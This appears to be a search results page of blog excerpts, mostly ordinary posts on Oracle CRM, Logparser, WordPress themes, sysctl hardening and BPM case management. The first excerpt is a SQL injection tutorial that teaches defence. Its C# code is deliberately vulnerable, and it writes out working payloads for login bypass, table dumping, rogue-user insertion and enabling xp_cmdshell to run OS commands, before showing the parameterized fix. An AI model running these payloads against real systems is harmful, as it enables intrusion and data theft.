Search Results

Search found 5136 results on 206 pages for 'comment bot'.

Page 103/206 | < Previous Page | 99 100 101 102 103 104 105 106 107 108 109 110  | Next Page >

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • CRM@Oracle Series: CRM Analytics

    - by tony.berk
    What is the most important factor that leads to a successful CRM deployment? Is it the overall strategy, strong governance, defined processes or good data quality? Well, it's definitely a combination of all these, but the most important differentiator from our experience is Business Intelligence. Business Intelligence or Analytics is commonly mentioned as a key aspect to successful CRM and other enterprise deployments. The good news is that Oracle provides pre-built analytics dashboards, which provide real-time, actionable insight, and tools to build custom analyses. However, success with analytics, especially in a large enterprise, still requires a strong strategy, clean data for analysis, and performance. Today's CRM@Oracle slidecast covers Oracle's strategy, architecture and key success factors for deploying CRM Analytics internally at Oracle. CRM@Oracle: CRM Analytics Click here to learn more about Oracle CRM products and here to learn about Oracle Business Intelligence Applications. Have you read our other postings in the CRM@Oracle Series? If you have a particular CRM area or function which you'd like to hear how Oracle implemented it internally, post a comment and we'll get it on our list.

    Read the article

  • Logparser and Powershell

    - by Michel Klomp
    Logparser in powershell One of the few examples how to use logparser in powershell is from the Microsoft.com Operations blog. This script is a good base to create more advanced logparser scripts: $myQuery = new-object -com MSUtil.LogQuery $szQuery = “Select top 10 * from r:\ex07011210.log”; $recordSet = $myQuery.Execute($szQuery) for(; !$recordSet.atEnd(); $recordSet.moveNext()) {             $record=$recordSet.getRecord();             write-host ($record.GetValue(0) + “,”+ $record.GetValue(1)); } $recordSet.Close(); Logparser input formats The previous example uses the default logparser object, you can extent this with the logparser input formats. with this formats get information from the event-log, different types of logfiles, the Active Directory, the registry and XML files. Here are the different ProgId’s you can use. Input Format ProgId ADS MSUtil.LogQuery.ADSInputFormat BIN MSUtil.LogQuery.IISBINInputFormat CSV MSUtil.LogQuery.CSVInputFormat ETW MSUtil.LogQuery.ETWInputFormat EVT MSUtil.LogQuery.EventLogInputFormat FS MSUtil.LogQuery.FileSystemInputFormat HTTPERR MSUtil.LogQuery.HttpErrorInputFormat IIS MSUtil.LogQuery.IISIISInputFormat IISODBC MSUtil.LogQuery.IISODBCInputFormat IISW3C MSUtil.LogQuery.IISW3CInputFormat NCSA MSUtil.LogQuery.IISNCSAInputFormat NETMON MSUtil.LogQuery.NetMonInputFormat REG MSUtil.LogQuery.RegistryInputFormat TEXTLINE MSUtil.LogQuery.TextLineInputFormat TEXTWORD MSUtil.LogQuery.TextWordInputFormat TSV MSUtil.LogQuery.TSVInputFormat URLSCAN MSUtil.LogQuery.URLScanLogInputFormat W3C MSUtil.LogQuery.W3CInputFormat XML MSUtil.LogQuery.XMLInputFormat Using logparser to parse IIS logs if you use the IISW3CinputFormat you can use the field names instead of de row number to get the information from an IIS logfile, it also skips the comment rows in the logfile. $ObjLogparser = new-object -com MSUtil.LogQuery $objInputFormat = new-object -com MSUtil.LogQuery.IISW3CInputFormat $Query = “Select top 10 * from c:\temp\hb\ex071002.log”; $recordSet = $ObjLogparser.Execute($Query, $objInputFormat) for(; !$recordSet.atEnd(); $recordSet.moveNext()) {     $record=$recordSet.getRecord();     write-host ($record.GetValue(“s-ip”) + “,”+ $record.GetValue(“cs-uri-query”)); } $recordSet.Close();

    Read the article

  • 14 WordPress Photo Blog & Portfolio Themes

    - by Aditi
    The best thing you can do to preserve your memories is to capture them. Photographs can help you relive all those sweet moments you had with your special someone or the ones closest to you. With the sudden explosion in the number of blogs on blogosphere it was quite obvious that many bloggers would like to share their most cherished memories on their blog. We saw blogs full of images along with the intricate details and now we are presenting you some WordPress themes to help you showcase your photography or make a photo blog so that you can share those small delights you captured with your special ones, no matter where they are. These WordPress photo blog themes are not just limited for personal use as some of them have been designed especially for professional use. Graphix Price: $69 Single & $149 Developer Package | DownLoad DeepFocus Price: $39 Package | DownLoad ReCapture Price: $50 or $75 Package | DownLoad PhotoGraphic Price: $50 or $75 Package | DownLoad PhotoLand Price: $39 Single & $99 Developer Package | DownLoad SimplePress Perfect Theme for showcasing your Portfolio, very simple & easy to navigate. Lots of Features. Price: $39 Single & $99 Developer Package | DownLoad ePhoto Price: $39 Single & $99 Developer Package | DownLoad Outline Price: $50 or $75 Package | DownLoad Gallery The theme features a simple options panel for easy setup, automatic resizing & cropping for thumbnails, and 5 colour styles. Price: $49 | DownLoad eGallery eGallery is one of the best theme to showcase your images. It has some features which you don’t see in any other themes of this kind. It’s particularly nice if you want to encourage social interaction as readers can rate and comment on your images. It is compatible with all major web browsers. Price: $39 | DownLoad Photoblog Price: $49 | DownLoad Ultra Web Studio Price: $30 | DownLoad Showtime Ultimate WordPress Theme for you to create your web portfolio, 3 different styles. Price: $40 | DownLoad Boomerang Price: $35 | DownLoad Related posts:6 PhotoBlog Portfolio WordPress Themes Wootube WordPress Video Blog Theme 7 Portfolio WordPress Themes

    Read the article

  • CRM at Oracle Series: Do Not Call & Do Not Email

    - by tony.berk
    Who you gonna call? Or not call! Sorry, just kidding, this isn't a movie blog! Do Not Call is an important topic for all businesses as there are government regulations that can lead to significant fines, and of course, possible damage to your brand. Oracle leverages Siebel CRM to develop an effective solution to address the Do Not Call and Email Permissible Use requirements. The application uses the Contacts functionality to manage communication preferences, which when defined, centrally synchronizes all contact records that share the same phone number and email address. Additionally, the relevant information is masked so Oracle employees cannot accidentally reach out to the contact. Therefore, the solution ensures that we are compliant with regulations, enables us to respect individuals' communication preferences and provides an audit trail of changes to their preferences. Today's CRM at Oracle slidecast discusses the requirements, highlights benefits and provides screen shots of the solution. CRM at Oracle Series: Do Not Call & Do Not Email Click here to learn more about Siebel CRM and other Oracle CRM products. Are you enjoying the CRM at Oracle Series? We are working on more topics for this year, but if there is a particular CRM area or function which you'd like to hear how Oracle implemented it internally, leave us a comment and we'll try to get it on our list.

    Read the article

  • SQL SERVER – DMV to Identify Incremental Statistics – Performance improvements in SQL Server 2014 – Part 3

    - by Pinal Dave
    This is the third part of the series Incremental Statistics. Here is the index of the complete series. What is Incremental Statistics? – Performance improvements in SQL Server 2014 – Part 1 Simple Example of Incremental Statistics – Performance improvements in SQL Server 2014 – Part 2 DMV to Identify Incremental Statistics – Performance improvements in SQL Server 2014 – Part 3 In earlier two parts we have seen what is incremental statistics and its simple example. In this blog post we will be discussing about DMV, which will list all the statistics which are enabled for Incremental Updates. SELECT  OBJECT_NAME(sys.stats.OBJECT_ID) AS TableName, sys.columns.name AS ColumnName, sys.stats.name AS StatisticsName FROM   sys.stats INNER JOIN sys.stats_columns ON sys.stats.OBJECT_ID = sys.stats_columns.OBJECT_ID AND sys.stats.stats_id = sys.stats_columns.stats_id INNER JOIN sys.columns ON sys.stats.OBJECT_ID = sys.columns.OBJECT_ID AND sys.stats_columns.column_id = sys.columns.column_id WHERE   sys.stats.is_incremental = 1 If you run above script in the example displayed, in part 1 and part 2 you will get resultset as following. When you execute the above script, it will list all the statistics in your database which are enabled for Incremental Update. The script is very simple and effective. If you have any further improved script, I request you to post in the comment section and I will post that on blog with due credit. Reference: Pinal Dave (http://blog.sqlauthority.com)Filed under: PostADay, SQL, SQL Authority, SQL Performance, SQL Query, SQL Server, SQL Tips and Tricks, T SQL Tagged: SQL Statistics, Statistics

    Read the article

  • myToys.de GmbH announces integration of ZVT payment terminal interface with Oracle Retail Point-of-Service

    - by user801960
    In our latest guest post, Sascha Kraatz, Developer Oracle E-Business Suite of myToys.de announces the development and integration of its ZVT payment terminal interface with the Oracle Retail Point-of-Service solution. myToys.de GmbH, which runs Oracle Retail Point-of-Service (ORPOS) in its 13 retail stores in Germany (see press release), has developed and implemented a Java-based interface for integrating the ZVT payment terminal with ORPOS. Through the combined support of payment service provider, easycash GmbH, and Ingenico GmbH, Germany´s leading payment terminal provider, myToys.de has become the first organisation to create this new automated solution for the Oracle Retail Point-of-Service, which has eliminated input errors that could occur with manual payment terminals and is localised for the German market. Ingo Stober, head of retail business at myToys.de confirms: “With this solution, we can speed up the payment process, reduce manual errors and enhance the customer experience in our stores”. myToys.de GmbH is a member of the Otto Group and one of the leading multichannel retailers for toys and other kids products in Germany. Customers can choose from over 100,000 attractive products, starting with items for expectant mothers or basic baby equipment to items for school children and beyond. In 2006, the first of 13 myToys.de retail branches was opened. If you would like to find out more about this solution, please contact the head of Oracle E-Business Suite Development at myToys.de, Mr. Ralf Schmilewski, or leave a comment below.

    Read the article

  • Visual Studio Talk Show #114 is now online - Le responsable de projet est-il mort? (French)

    - by guybarrette
    http://www.visualstudiotalkshow.com Bernard Fedotoff: Le responsable de projet est-il mort? Nous discutons avec Bernard Fedotoff sur comment jumeler la gestion de projet et les méthodes de développement agile. Entre autres, avec les méthodes agiles on se demande où est la place du responsable de projet. Bernard Fedotoff est Microsoft Regional Director depuis 1996 ; il a animé les Devdays et Techdays en Suisse et en France depuis 1997. Il a été fondateur et PDG de PSEngineering depuis 1990, société qu’il a revendue en 2004. En 2005, il a fondé la société Agilcom. Bernard a mené auprès de clients français, suisses, et d'afrique du nord de nombreuses missions en technologie .Net, d'architecture et de coaching d'équipes de dévoppement. Son passé de Pdg et son expertise technologique apportent aux projets qu'il accompagne deux points de vue riches d'expériences et de convictions. Il a aussi accompagné la mise en place de plateaux offshores vers la Tunisie, en implémentant des approches Agile avec Team Foundation Server. Enfin, il est aussi co-auteur de nombreux ateliers des coachs publiés sur le site MSDN de Microsoft France. Bernard est titulaire d’un diplôme d’ingénieur ainsi que d’un troisième cycle universitaire en robotique. Il consacre ses quelques minutes de temps libre à la montagne Télécharger l'émission Si vous désirez un accès direct au fichier audio en format MP3, nous vous invitons à télécharger le fichier en utilisant un des boutons ci-dessous. Si vous désirez utiliser le feed RSS pour télécharger l'émission, nous vous invitons à vous abonnez en utilisant le bouton ci-dessous. Si vous désirez utiliser le répertoire iTunes Podcast pour télécharger l'émission, nous vous encourageons à vous abonnez en utilisant le bouton ci-dessous. var addthis_pub="guybarrette";

    Read the article

  • New Experts Direct Contribution - Multiple Currency in Analytics

    - by Cheryl
    We do our best to anticipate what you need to know when we design and write our courses for CRM On Demand. But we know that we cannot hit on every situation or implementation scenario that you might encounter. That's why I love our Experts Direct program - this is where we encourage our wide network of CRM On Demand experts to contribute knowledge that they have gained from working directly with companies on their specific challenges or questions. (See Direct From Our Experts!) The latest Experts Direct contribution comes from Leon Dolman, who works with CRM On Demand customers every day. Leon addresses what you should expect to see in your reports and in the application when your company's users enter opportunity revenue information in more than one currency. He works through a scenario to show how currency settings can affect the data that you see in your reports. For example, do you know what will you see in your Opportunity reports if you have two different currencies represented, besides your company's default currency, but your company administrator has only set exchange rates for one of them? Leon knows...and now he has shared that knowledge - and more - with the rest of us. Go to the Multiple Currency in Analytics item in the Training and Support Center to read more - and while you're there, take a look at the other Experts Direct content to tap into that expert knowledge that we're collecting for you. Just click the Browse More Topics link in the Experts Direct box on the home page to see the full list. And let us know if there are other topics that you'd like to see our experts address. Post a comment to start a conversation or send us an email.

    Read the article

  • vsftpd: chroot_local_user causes GNU/TLS-error

    - by akrosikam
    Distro: Ubuntu 12.04.2 Server 32-bit Server client: vsftpd 2.3.5 (from default "main" repository) Problem: Since upgrading from Ubuntu 10.04 to Ubuntu 12.04 (nothing changed on client-side), vsftp has refused to make chroot-jails with the "chroot_local_user" directive on FTP(e/i)S-connections. Here's my vsftpd.conf: anonymous_enable=NO local_enable=YES write_enable=YES local_umask=022 dirmessage_enable=YES xferlog_enable=YES xferlog_std_format=YES ftpd_banner=How are you gentlemen. listen=YES pam_service_name=vsftpd userlist_enable=YES userlist_deny=NO tcp_wrappers=YES connect_from_port_20=YES ftp_data_port=20 listen_port=21 pasv_enable=YES pasv_promiscuous=NO pasv_min_port=4242 pasv_max_port=4252 pasv_addr_resolve=YES pasv_address=your.domain.com ssl_enable=YES allow_anon_ssl=NO force_local_logins_ssl=YES force_local_data_ssl=YES ssl_tlsv1=YES ssl_sslv2=NO ssl_sslv3=NO rsa_cert_file=/home/maw/ssl_ftp_test/vsftpd.pem rsa_private_key_file=/home/maw/ssl_ftp_test/vsftpd.pem debug_ssl=YES log_ftp_protocol=YES ssl_ciphers=HIGH chroot_local_user=NO How to reproduce: Have a working SSL/TLS-secured vsftpd-configuration (I suggest similar to the one above) ready. Try to connect with an FTP user client and upload some files. With my setup, the above listed config works well at this point. Edit /etc/vsftpd.conf and set chroot_local_user= to YES. Make sure that chroot_list_enable= and/or chroot_list_file= are not set. Comment them out if they are. Save and exit. Run sudo restart vsftpd (or sudo service vsftpd restart if you like) in a terminal. Try to connect with an FTP user client. You should see a message more or less like this: GnuTLS error -15: An unexpected TLS packet was received. This is an issue for me, as I do not want FTP-sessions to be able to list files outside the user's home folder. I have checked with several client-side apps, and I get the same results with every one of them. Filezilla is not so good regarding cipher methods nowadays, but as I am able to make an FTP(e)s-connection over TLS (as long as chroot'ing is disabled and ssl_ciphers is set to HIGH) I have a feeling ciphers are not the issue this time, and that I won't find the answer by tweaking configs on the client side. My vsftpd.log stays empty, even though debug_ssl and log_ftp_protocol are enabled, so no info there either.

    Read the article

  • Feasibility to take over a JavaMe Project by Coders who have no experience in JavaMe

    - by Stephenmjm
    As the original JavaMe team will leave to do other items. The JavaMe project will be taken over by some guys knowing nothing about JavaMe. Transition period: One month About this JavaMe project: about 3.5 million lines of code (more than 180 java file, SourceCode is 8.5KB in total) using the Polish, Proguard document: The JavaMe project itself have no document. No UML map. Difficulties I guess: familiar with the JavaMe, this should be okay In order to do the further development. We need to Read the sourceCode ---- It's not easy to read 3.5 million lines of code having not enough comment Adaptation work for more than 100 phone These are the questions, thank you! In the case of our guys have no experience in JavaMe, Is one month too hasty? In order to take the job in time . What we should ask the original JavaMe team to do . Considering we hava no experience in JavaMe. The complication we taking the Adaptation work without the original JavaMe team? Any other suggestions?

    Read the article

  • Hardening network with sysctl settings made Wi-fi downloading speed extremely slow

    - by Rohit Bansal
    I just followed up following steps to harden network security The /etc/sysctl.conf file contain all the sysctl settings. Prevent source routing of incoming packets and log malformed IP's enter the following in a terminal window: sudo vi /etc/sysctl.conf Edit the `/etc/sysctl.conf` file and un-comment or add the following lines : # IP Spoofing protection net.ipv4.conf.all.rp_filter = 1 net.ipv4.conf.default.rp_filter = 1 # Ignore ICMP broadcast requests net.ipv4.icmp_echo_ignore_broadcasts = 1 # Disable source packet routing net.ipv4.conf.all.accept_source_route = 0 net.ipv6.conf.all.accept_source_route = 0 net.ipv4.conf.default.accept_source_route = 0 net.ipv6.conf.default.accept_source_route = 0 # Ignore send redirects net.ipv4.conf.all.send_redirects = 0 net.ipv4.conf.default.send_redirects = 0 # Block SYN attacks net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 2048 net.ipv4.tcp_synack_retries = 2 net.ipv4.tcp_syn_retries = 5 # Log Martians net.ipv4.conf.all.log_martians = 1 net.ipv4.icmp_ignore_bogus_error_responses = 1 # Ignore ICMP redirects net.ipv4.conf.all.accept_redirects = 0 net.ipv6.conf.all.accept_redirects = 0 net.ipv4.conf.default.accept_redirects = 0 net.ipv6.conf.default.accept_redirects = 0 # Ignore Directed pings net.ipv4.icmp_echo_ignore_all = 1 To reload sysctl with the latest changes, enter: sudo sysctl -p But, after applying the changes I found "Wi-fi" downloading speed and terminal downloading speed extremely slow (less than 1KB/s) however surfing speed through browser was good. But, using direct ethernet cable was giving a good speed. Then, I reverted back the above changes and things fall back in line once again.... Could you please let me know what possibly in above script is affecting such behaviour [and why] ? How could I still maintain hardening of network security without disturbing Wi-fi downloading speed ?

    Read the article

  • Notes on Oracle BPM PS6 Adaptive Case Management

    - by gcolman
    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} I have recently been looking at the  latest release of the BPM Case Management feature in the Oracle BPM PS6 release. I had put together some notes to help me gain a better understanding of the context of the PS6 BPM Case Management. Hopefully, this along with the other resources will enable you to gain a clear picture of the flexibility of this feature. Oracle BPM PS6 release includes Case Management capability. This initial release aims to provide: Case Management Framework Integration of Case Management with BPM & SOA suite It is best to regard the current PS6 case management feature as a case management framework. The framework provides the building blocks for creating a case management system that is fully integrated into Oracle BPM suite. As of the current PS6 release, no UI tooling exists to help manage cases or the case lifecycle. Mark Foster has written a good blog which outlines Case Management within PS6 in the following link. I wanted to provide more context on Case Management from my perspective in this blog. PS6 Case Management - High level View BPM PS6 includes “Case” as a first class component in a SOA Suite composite. The Case components (added to the SOA Composite) are created when a BPM process is assigned to a case in JDveloper. The SOA Case component is defined and configured within JDevloper, which allows us to specify the case data structures and metadata such as stakeholders, outcomes, milestones, document stores etc. "Activities" are associated with a case, and become available to be executed via the case apis. Activities are BPM processes, Human Activities or Java call outs. The PS6 release includes some additional database tables to store the case metadata and case instance data (data object, comments, etc…). These new tables are created within the SOA_INFRA schema and the documents associated with that case into a document repository that is configured with the case. One of the main features of Case Management is the control of the case logic through case events and case business rules. A PS6 Case has an associated business rule component, which can be configured to control the availability and execution of activities within the case. The business rules component is able to act upon events that the PS6 Case Management framework generates during the lifecycle of that case. Events are fired during the lifetime of the case (e.g. Case created, activity started, activity ended, note added, document uploaded.) Internal Case state The internal state of a case is represented by the diagram below. This shows the internal states and the transition paths for a Case from one state to the next Each transition in state will create an event that can be enacted upon via the Case rules engine. The internal case state lifecycle is defined as follows Defining a case A Case is created and defined as a component of a JDeveloper BPM project. When you create a Case as part of a BPM project, JDeveloper, creates the following components within the SCA composite: Case component Case component interfaces (WSDL etc) Case Rules component (Oracle Business Rules) Adds the Case Component and Case Rules Component to the BPM SOA composite Case Configuration The following section gives a high level overview of the items that can be configured for a BPM Case. Case Activities A Case is associated with a set of activities that are to be performed as part of that Case. Case activities can be: SOA Human Tasks BPM processes Custom Task (Java Class) Case activities are created from pre-existing BPM process or human tasks, which, once defined, can be configured additionally as Case activities in JDeveloper and made available within the lifecycle of a case. I've described the following configurable components of a case (very!) briefly as: Milestones Milestones are (optional) user defined logical milestones that can be achieved within a case. No activities are associates with a milestone, but milestone attainment can be programmatically set and events raised when milestones are reached Outcomes User defined status of a completed case. An event is fired when an outcome is attained. Case Data Defines the data that will be stored with a case XML schemas define the data that is stored with the case. Case Documents Defines the location of documents that are attached to a case (e.g. WebCenter Content) User Defined Events Optional user defined events that can be fired or captured to drive case processing rules Stakeholders Defines the actors who can participate in the case (roles, users, groups) Defines permissions for individual case permissions (read case, create document etc…) Business Rules Business rules are the main component controlling the flow of a Case Each case has an associated business ruleset Rules are fired on receiving Case events (or User defined events) Life cycle events Milestone events Activity events Data events Document events Comment events User event Managing the Case Managing the lifecycle of a case is achieved in two ways: Managing case logic with Business Rules Managing the case lifecycle via the Case APIs. A BPM Case can be viewed as a set of case data & documents along with the activities that can be performed within a case and also the case lifecycle state expressed as milestones and internal lifecycle state. The management of the case life is achieved though both the configuration of business rules and the “manual” interaction with a case instance through the Case APIs. Business Rules and Case Events A key component within the Case management framework is the event model. The BPM Case Management solution internally utilizes Oracle EDN (Event Delivery Network) to publish and subscribe to events generated by the Case framework. Events are generated by the Case framework on each of the processes and stages that a case instance will travel on its lifetime. The following case events are part of the BPM Case: Life cycle events Milestone events Activity events Data events Document events Comment events User event The Case business rules are configured to listen for these events, and business logic can be coded into the Case rules component to enact upon an event being received. Case API & Interaction Along with the business rules component, Cases can be managed via the Case API interfaces. These interfaces allow for the building of custom applications to integrate into case management framework. The API’s allow for updating case comments & documents, executing case activities, updating milestones etc. As there is no in built case management UI functions within the PS6 release, Cases need to be managed via a custom built UI, interacting with selected case instances, launching case activities, closing cases etc. (There is expected to be a UI component within subsequent releases) Logical Case Flow The diagram below is intended to depict a logical view of the case steps for a typical case. A UI or other service calls the Case interface to create a Case instance The case instance is created & database data inserted A lifecycle event is raised indicating a case activity (created) event The case business rules capture the event and decide on an action to take Additionally other parties can subscribe to Case events via EDN The business rules may handle the event, e.g. configured to execute a case activity on case creation event The BPM/Human Workflow/Custom activity is executed A case activity event is raised on the execute activity A case work UI or business service can inspect the case instance and call other actions to progress that case, such as: Execute activity Add Note Add document Add case data Update Milestone Raise user defined event Suspend case Resume case Close Case Summary Having had a little time to play around with the APIs and the case configuration, I really like the flexibility and power of combining Oracle Business Rules and the BPM Case Management event model. Creating something this flexible and powerful without BPM Case Management would take a lot of time and effort. This is 